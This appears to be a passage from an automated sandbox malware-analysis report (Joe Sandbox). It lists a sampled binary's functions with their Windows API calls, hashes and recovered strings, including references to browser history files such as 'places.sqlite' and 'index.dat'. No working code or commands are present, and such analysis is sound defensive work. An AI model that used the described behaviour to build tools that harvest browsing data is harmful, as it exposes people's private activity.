                                                                                                                                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1979745280-0
                                                                                                                                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                • memset.MSVCRT ref: 00403A55
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                • String ID: history.dat$places.sqlite
                                                                                                                                                • API String ID: 2641622041-467022611
                                                                                                                                                • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                                                                • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                                                                • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$File$PointerRead
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 839530781-0
                                                                                                                                                • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileFindFirst
                                                                                                                                                • String ID: *.*$index.dat
                                                                                                                                                • API String ID: 1974802433-2863569691
                                                                                                                                                • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$FilePointer
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1156039329-0
                                                                                                                                                • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3397143404-0
                                                                                                                                                • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1125800050-0
                                                                                                                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                                                • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandleSleep
                                                                                                                                                • String ID: }A
                                                                                                                                                • API String ID: 252777609-2138825249
                                                                                                                                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                                                Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • malloc.MSVCRT ref: 00409A10
                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                • free.MSVCRT ref: 00409A31
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: freemallocmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3056473165-0
                                                                                                                                                • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                                                • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                Function 00415320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • failed memory resize %u to %u bytes, xrefs: 00415358
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: realloc
                                                                                                                                                • String ID: failed memory resize %u to %u bytes
                                                                                                                                                • API String ID: 471065373-2134078882
                                                                                                                                                • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                                                                                                                • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                                                                                                                                                • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                                                                                                                • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                                                                                                                                                Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: d
                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: BINARY
                                                                                                                                                • API String ID: 2221118986-907554435
                                                                                                                                                • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                • String ID: /stext
                                                                                                                                                • API String ID: 2081463915-3817206916
                                                                                                                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2445788494-0
                                                                                                                                                • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3150196962-0
                                                                                                                                                • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: malloc
                                                                                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                                                                                • API String ID: 2803490479-1168259600
                                                                                                                                                • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmpmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1065087418-0
                                                                                                                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1381354015-0
                                                                                                                                                • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2221118986-0
                                                                                                                                                • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
